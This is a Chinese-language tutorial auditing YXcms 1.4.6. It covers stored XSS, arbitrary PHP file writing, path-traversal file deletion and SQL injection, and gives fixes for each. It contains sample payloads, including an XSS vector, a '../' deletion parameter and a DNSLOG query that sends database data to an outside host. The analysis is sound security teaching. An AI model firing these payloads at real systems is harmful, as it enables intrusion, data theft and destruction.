YXcms代码审计与漏洞分析教学文档<\/h1>

一、系统概述<\/h2>
YXcms是一个内容管理系统，本次审计版本为1.4.6。系统目录结构如下：<\/p>
data\/               存放备份数据
protected\/          网站程序核心文件夹
public\/             存放css、images、js、swf等模板公用文件
upload\/             存放上传文件
.htaccess           apache伪静态规则文件
httpd.ini           iis伪静态规则文件
index.php           网站入口
robots.txt          robots协议
升级日志.txt        详细升级日志记录文件
<\/code><\/pre>
二、漏洞分析<\/h2>
1. 存储型XSS漏洞<\/h3>
漏洞位置<\/strong>：表单提交功能<\/p>
漏洞分析<\/strong>：<\/p>


输入过滤流程：<\/p>

前端输入 <svg\/onload=alert(1)><\/code><\/li>
经过html_in()<\/code>和deletehtml()<\/code>函数过滤<\/li>
存入数据库为：&lt;svg\/on&lt;x&gt;load=alert(1)&gt;<\/code><\/li>
<\/ul>
<\/li>

输出问题：<\/p>

后台查看时使用html_out()<\/code>函数处理<\/li>
html_out()<\/code>函数使用htmlspecialchars_decode()<\/code>将实体转换回普通字符<\/li>
导致XSS代码被还原执行<\/li>
<\/ul>
<\/li>
<\/ol>
关键函数<\/strong>：<\/p>
function<\/span> html_out<\/span>($str){
<\/span><\/span>    if<\/span>(function_exists<\/span>('htmlspecialchars_decode'<\/span>))
<\/span><\/span>        $str=<\/span>htmlspecialchars_decode<\/span>($str);
<\/span><\/span>    else<\/span>
<\/span><\/span>        $str=<\/span>html_entity_decode<\/span>($str);
<\/span><\/span>    $str =<\/span> stripslashes<\/span>($str);
<\/span><\/span>    return<\/span> $str;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>修复建议<\/strong>：<\/p>

在输出时保持HTML实体编码<\/li>
或使用更严格的过滤函数<\/li>
<\/ul>
2. 任意PHP文件添加漏洞<\/h3>
漏洞位置<\/strong>：protected\/apps\/admin\/controller\/setController.php<\/code>中的tpadd<\/code>方法<\/p>
漏洞分析<\/strong>：<\/p>

漏洞代码：<\/li>
<\/ol>
$filename=<\/span>trim<\/span>($_POST['filename'<\/span>]);
<\/span><\/span>$code=<\/span>stripcslashes<\/span>($_POST['code'<\/span>]);
<\/span><\/span>$filepath=<\/span>$templepath.<\/span>$filename.<\/span>'.php'<\/span>;
<\/span><\/span>file_put_contents<\/span>($filepath, $code);
<\/span><\/span><\/code><\/pre>
问题：

文件名和内容直接来自用户输入<\/li>
无有效过滤和验证<\/li>
强制添加.php后缀<\/li>
<\/ul>
<\/li>
<\/ol>
利用方式<\/strong>：<\/p>

直接写入PHP webshell<\/li>
可控制写入路径和内容<\/li>
<\/ul>
修复建议<\/strong>：<\/p>

严格限制文件名格式<\/li>
验证文件内容安全性<\/li>
限制写入目录<\/li>
<\/ul>
3. 任意文件删除漏洞(一)<\/h3>
漏洞位置<\/strong>：protected\/apps\/admin\/controller\/filesController.php<\/code>中的del<\/code>方法<\/p>
漏洞分析<\/strong>：<\/p>

漏洞代码：<\/li>
<\/ol>
$dirs=<\/span>in<\/span>($_GET['fname'<\/span>]);
<\/span><\/span>$dirs=<\/span>str_replace<\/span>(dirs<\/span>);
<\/span><\/span>$dirs=<\/span>ROOT_PATH<\/span>.<\/span>'upload'<\/span>.<\/span>$dirs;
<\/span><\/span>if<\/span>(file_exists<\/span>($dirs)) @<\/span>unlink<\/span>($dirs);
<\/span><\/span><\/code><\/pre>
问题：

in()<\/code>函数仅处理HTML和SQL注入，不处理路径遍历<\/li>
路径拼接可控<\/li>
无权限检查<\/li>
<\/ul>
<\/li>
<\/ol>
利用方式<\/strong>：<\/p>

通过..\/<\/code>遍历删除系统文件<\/li>
如：?fname=..\/..\/1.txt<\/code>删除根目录文件<\/li>
<\/ul>
修复建议<\/strong>：<\/p>

检查路径是否在允许范围内<\/li>
使用realpath()<\/code>解析路径<\/li>
添加权限验证<\/li>
<\/ul>
4. 任意文件删除漏洞(二)<\/h3>
漏洞位置<\/strong>：protected\/apps\/admin\/controller\/photoController.php<\/code>中的delpic<\/code>方法<\/p>
漏洞分析<\/strong>：<\/p>

漏洞代码：<\/li>
<\/ol>
$picname=<\/span>$_POST['picname'<\/span>];
<\/span><\/span>$path=<\/span>$this-><\/span>uploadpath<\/span>;
<\/span><\/span>if<\/span>(file_exists<\/span>($path.<\/span>$picname)) @<\/span>unlink<\/span>($path.<\/span>$picname);
<\/span><\/span><\/code><\/pre>
问题：

直接使用用户输入作为文件名<\/li>
无路径检查<\/li>
<\/ul>
<\/li>
<\/ol>
修复建议<\/strong>：<\/p>

同漏洞(一)的修复方案<\/li>
<\/ul>
5. SQL注入漏洞<\/h3>
漏洞位置<\/strong>：protected\/apps\/admin\/controller\/fragmentController.php<\/code>中的del<\/code>方法<\/p>
漏洞分析<\/strong>：<\/p>

漏洞代码：<\/li>
<\/ol>
$delid=<\/span>implode<\/span>(','<\/span>,$_POST['delid'<\/span>]);
<\/span><\/span>model<\/span>('fragment'<\/span>)-><\/span>delete<\/span>('id in ('<\/span>.<\/span>$delid.<\/span>')'<\/span>)
<\/span><\/span><\/code><\/pre>
问题：

数字型参数未强制转换<\/li>
直接拼接SQL语句<\/li>
仅对字符串参数进行过滤<\/li>
<\/ul>
<\/li>
<\/ol>
利用方式<\/strong>：<\/p>

通过DNSLOG外带数据<\/li>
如：select load_file(concat('\\\\',(select database()),'.test.dnslog.link\\abc'))<\/code><\/li>
<\/ul>
修复建议<\/strong>：<\/p>

强制参数类型转换<\/li>
使用预处理语句<\/li>
限制删除操作权限<\/li>
<\/ul>
三、安全防护机制分析<\/h2>
1. 输入过滤机制<\/h3>
主要函数<\/strong>：<\/p>

deletehtml()<\/code> - 去除HTML和JS标签<\/li>
html_in()<\/code> - 使用htmlspecialchars<\/code>和RemoveXSS<\/code>过滤<\/li>
in()<\/code> - 基本输入过滤<\/li>
<\/ol>
存在问题<\/strong>：<\/p>

过滤不统一<\/li>
部分场景过滤被反转<\/li>
对特殊路径字符过滤不足<\/li>
<\/ul>
2. 输出处理机制<\/h3>
主要函数<\/strong>：<\/p>

html_out()<\/code> - 反转HTML实体<\/li>
直接输出 - 部分场景无过滤<\/li>
<\/ol>
存在问题<\/strong>：<\/p>

输出过滤与输入过滤冲突<\/li>
缺乏上下文感知的输出编码<\/li>
<\/ul>
四、审计方法论总结<\/h2>


入口点定位<\/strong>：<\/p>

表单提交点<\/li>
文件操作功能<\/li>
数据库操作功能<\/li>
<\/ul>
<\/li>

数据流追踪<\/strong>：<\/p>

从输入到存储的完整流程<\/li>
从存储到输出的完整流程<\/li>
过滤函数的调用关系<\/li>
<\/ul>
<\/li>

权限验证检查<\/strong>：<\/p>

操作前权限验证<\/li>
功能间权限隔离<\/li>
<\/ul>
<\/li>

边界条件测试<\/strong>：<\/p>

极端输入测试<\/li>
过滤绕过尝试<\/li>
异常流程测试<\/li>
<\/ul>
<\/li>
<\/ol>
五、修复方案建议<\/h2>


统一安全策略<\/strong>：<\/p>

制定统一的输入输出过滤规范<\/li>
实现安全函数库<\/li>
<\/ul>
<\/li>

权限体系强化<\/strong>：<\/p>

最小权限原则<\/li>
操作前二次验证<\/li>
<\/ul>
<\/li>

安全机制改进<\/strong>：<\/p>

使用预处理语句防SQL注入<\/li>
实现文件操作白名单<\/li>
增加操作日志<\/li>
<\/ul>
<\/li>

代码审计流程<\/strong>：<\/p>

建立代码审查制度<\/li>
引入自动化审计工具<\/li>
<\/ul>
<\/li>
<\/ol>
六、参考资源<\/h2>

先知社区原帖<\/li>
PHP安全编程指南<\/li>
OWASP安全开发指南<\/li>
常见Web漏洞原理与防御<\/li>
<\/ol>

本教学文档详细分析了YXcms 1.4.6版本中的多个安全漏洞，包括漏洞原理、利用方式和修复建议，可作为代码审计和安全开发的参考材料。<\/p>